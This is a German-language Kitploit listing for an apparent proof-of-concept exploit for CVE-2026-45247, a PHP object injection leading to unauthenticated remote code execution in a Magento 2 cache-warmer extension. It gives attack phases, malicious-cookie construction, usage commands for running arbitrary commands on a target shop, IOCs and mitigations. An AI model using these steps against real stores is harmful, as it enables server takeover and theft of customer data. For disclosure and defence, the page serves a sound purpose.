Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — Funktionaler PoC für CVE-2026-45247: PHP Object Injection zu nicht authentifiziertem RCE in Mirasvit Full Page Cache (Magento 2). | Kitploit
Tools/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

Funktionaler PoC für CVE-2026-45247: PHP Object Injection zu nicht authentifiziertem RCE in Mirasvit Full Page Cache (Magento 2).

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-45247 - Mirasvit Full Page Cache Warmer for Magento 2 - PHP Object Injection → RCE

CVE-2026-45247 CVSS CISA KEV

📋 Beschreibung

CVE-2026-45247 ist eine kritische Schwachstelle für PHP-Objektinjektion (PHP Object Injection) in der Erweiterung Mirasvit Full Page Cache Warmer für Magento 2 und Adobe Commerce. Ein nicht authentifizierter Angreifer kann durch das Senden eines manipulierten serialisierten PHP-Objekts im Cookie CacheWarmer eine Remote Code Execution (RCE) erreichen.

Die Schwachstelle liegt im uneingeschränkten Aufruf der nativen PHP-Funktion unserialize(), kombiniert mit Gadget Chains, die in Magento und seinen Abhängigkeiten (insbesondere Monolog) verfügbar sind.

AttributWert
CVECVE-2026-45247
ProduktMirasvit Full Page Cache Warmer for Magento 2
Betroffene VersionenAlle Versionen vor 1.11.12
Verfügbarer PatchVersion 1.11.12 (25. Mai 2026)
CVSS-Score9.8 (Kritisch)
VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Status in CISA KEVAktive Ausnutzung bestätigt (hinzugefügt am 03.06.2026)
Frist06.06.2026

🚨 Angriffsmechanismus

  1. Die Erweiterung verarbeitet das Cookie CacheWarmer bei jeder Shop-Anfrage
  2. Der Cookie-Wert wird ohne Sanitisierung an unserialize() übergeben
  3. Ein Angreifer sendet ein bösartiges serialisiertes PHP-Objekt
  4. Mithilfe von Monolog-Gadget-Chains (SyslogUdpHandler, BufferHandler, FingersCrossedHandler) wird RCE erreicht
  5. Der Befehl wird auf dem Server mit den Rechten des Webdienstes ausgeführt

⚙️ Angriffsphasen

Phase 1: Aufklärung

root@kitploit:~
# Verificar si la tienda usa Mirasvit Cache Warmer
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

Phase 2: Schwachstellenanalyse

root@kitploit:~
# La cookie se procesa en cada request sin autenticación
# El código vulnerable en Mirasvit:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # ¡Peligro!

Phase 3: Ausführung des Exploits

root@kitploit:~
# Construcción de la cookie maliciosa
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# Envío de la petición
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ Verwendung des PoC

Installation

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

Grundlegende Ausführung

root@kitploit:~
# Verificar vulnerabilidad
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# Ejecutar comando 'id'
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# Ejecutar comando personalizado
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# Usar proxy para depuración
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

Schnelles Skript

root@kitploit:~
# Verificar con script bash
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 Demonstrierte Auswirkungen

  • Remote-Befehlsausführung (RCE) auf dem Magento-Server
  • Voller Zugriff auf die Kundendatenbank und Bestellungen
  • Installation von Webshells zur Persistenz
  • Vollständige Kompromittierung des Online-Shops
  • Mögliche Offenlegung von Kreditkartendaten
  • Laterale Bewegung in der Unternehmensinfrastruktur

🛡️ Erkennung

Kompromittierungsindikatoren (IOCs)

In Zugriffsprotokollen:

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

Bei der Ausnutzung beobachtete Befehle:

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

Verwendete Gadget Chains:

  • Monolog\Handler\SyslogUdpHandler

  • Monolog\Handler\BufferHandler

  • Monolog\Handler\FingersCrossedHandler

  • Monolog\Handler\GroupHandler

🔧 Gegenmaßnahmen

Sofortige Aktualisierung

root@kitploit:~
# Actualizar a versión parcheada
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

Temporäre Gegenmaßnahmen

root@kitploit:~
# Bloquear cookie CacheWarmer en .htaccess o nginx
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// En app/code/local/Custom/BlockCookie.php
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
Tool herunterladen